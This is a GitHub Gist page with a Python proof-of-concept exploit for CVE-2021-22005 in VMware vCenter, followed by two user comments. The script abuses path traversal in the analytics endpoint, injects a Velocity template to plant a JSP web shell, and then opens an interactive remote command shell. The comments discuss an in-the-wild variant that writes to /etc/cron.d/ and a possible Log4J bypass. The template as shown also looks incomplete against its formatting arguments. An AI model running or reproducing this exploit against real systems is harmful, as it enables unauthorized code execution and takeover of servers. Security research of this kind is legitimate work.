-
-
Save testanull/c2f6fd061c496ea90ddee151d6738d2e to your computer and use it in GitHub Desktop.
CVE-2021-22005_PoC.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import requests | |
import random | |
import string | |
import sys | |
import time | |
import requests | |
import urllib3 | |
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) | |
def id_generator(size=6, chars=string.ascii_lowercase + string.digits): | |
return ''.join(random.choice(chars) for _ in range(size)) | |
def escape(_str): | |
_str = _str.replace("&", "&") | |
_str = _str.replace("<", "<") | |
_str = _str.replace(">", ">") | |
_str = _str.replace("\"", """) | |
return _str | |
def run_shell(url, pwd, cmd): | |
burp0_url = url | |
burp0_headers = {"User-Agent": "Mozilla/5.0", "Connection": "close", "Content-Type": "application/x-www-form-urlencoded"} | |
burp0_data = {pwd: cmd.strip()} | |
ct = requests.post(burp0_url, headers=burp0_headers, data=burp0_data, verify=False).content | |
ct = ct.split('<pre>')[1].split('</pre>')[0] | |
return ct | |
def createAgent(url, agent_name): | |
burp0_url = url + "/analytics/ceip/sdk/..;/..;/..;/analytics/ph/api/dataapp/agent?_c="+agent_name+"&_i=test2" | |
burp0_headers = {"Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0", "X-Deployment-Secret": "abc", "Content-Type": "application/json", "Connection": "close"} | |
burp0_json={"manifestSpec":{}, "objectType": "a2", "collectionTriggerDataNeeded": True,"deploymentDataNeeded":True, "resultNeeded": True, "signalCollectionCompleted":True, "localManifestPath": "a7","localPayloadPath": "a8","localObfuscationMapPath": "a9" } | |
requests.post(burp0_url, headers=burp0_headers, json=burp0_json, verify=False) | |
pwd = id_generator(6) | |
agent_name = id_generator(6) | |
shell_name = id_generator(6)+".jsp" | |
manifestData = """<manifest recommendedPageSize="500"> | |
<request> | |
<query name="vir:VCenter"> | |
<constraint> | |
<targetType>ServiceInstance</targetType> | |
</constraint> | |
<propertySpec> | |
<propertyNames>content.about.instanceUuid</propertyNames> | |
<propertyNames>content.about.osType</propertyNames> | |
<propertyNames>content.about.build</propertyNames> | |
<propertyNames>content.about.version</propertyNames> | |
</propertySpec> | |
</query> | |
</request> | |
<cdfMapping> | |
<indepedentResultsMapping> | |
<resultSetMappings> | |
<entry> | |
<key>vir:VCenter</key> | |
<value> | |
<value xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:type="resultSetMapping"> | |
<resourceItemToJsonLdMapping> | |
<forType>ServiceInstance</forType> | |
<mappingCode><![CDATA[ | |
#set($modelKey = $LOCAL-resourceItem.resourceItem.getKey())## | |
#set($objectId = "vim.ServiceInstance:$modelKey.value:$modelKey.serverGuid")## | |
#set($obj = $LOCAL-cdf20Result.newObject("vim.ServiceInstance", $objectId))## | |
$obj.addProperty("OSTYPE", "VMware can't steal this PoC")## | |
$obj.addProperty("BUILD", $content-about-build)## | |
$obj.addProperty("VERSION", $content-about-version)##]]> | |
</mappingCode> | |
</resourceItemToJsonLdMapping> | |
</value> | |
</value> | |
</entry> | |
</resultSetMappings> | |
</indepedentResultsMapping> | |
</cdfMapping> | |
<requestSchedules> | |
<schedule interval="1h"> | |
<queries> | |
<query>vir:VCenter</query> | |
</queries> | |
</schedule> | |
</requestSchedules> | |
</manifest>""" % (shell_name, pwd, pwd) | |
target = sys.argv[1] | |
print "Target: "+ target | |
print "Creating Agent (of SHIELD) ..." | |
createAgent(target, agent_name) | |
print "Collecting Agent (of SHIELD) ..." | |
burp0_url = target+"/analytics/ceip/sdk/..;/..;/..;/analytics/ph/api/dataapp/agent?action=collect&_c="+agent_name+"&_i=test2" | |
burp0_headers = {"Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0", "X-Deployment-Secret": "abc", "Content-Type": "application/json", "Connection": "close"} | |
burp0_json={"contextData": "a3", "manifestContent": manifestData, "objectId": "a2"} | |
requests.post(burp0_url, headers=burp0_headers, json=burp0_json, verify=False, proxies={"https":"http://127.0.0.1:8080"}) | |
print "Success!" | |
print "Shell: " + target+"/idm/..;/"+shell_name | |
print "Pwd: "+ pwd | |
print "Launching pseudo shell ..." | |
while True: | |
cmd = raw_input("/remote_shell/# ").strip() | |
if(cmd =="quit"): | |
sys.exit(-1) | |
output = run_shell(target+"/idm/..;/"+shell_name,pwd, cmd) | |
time.sleep(1) | |
print(output) |
It looks like this is being exploited in the wild a simpler way by writing a json file to /etc/cron.d/ without doing the velocity template injection https://attackerkb.com/topics/15E0q0tdEZ/cve-2021-22005 Are you going to publish a full poc?
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
did anyone manage to abuse GLOBAL-Logger (Log4J) to bypass Velocity?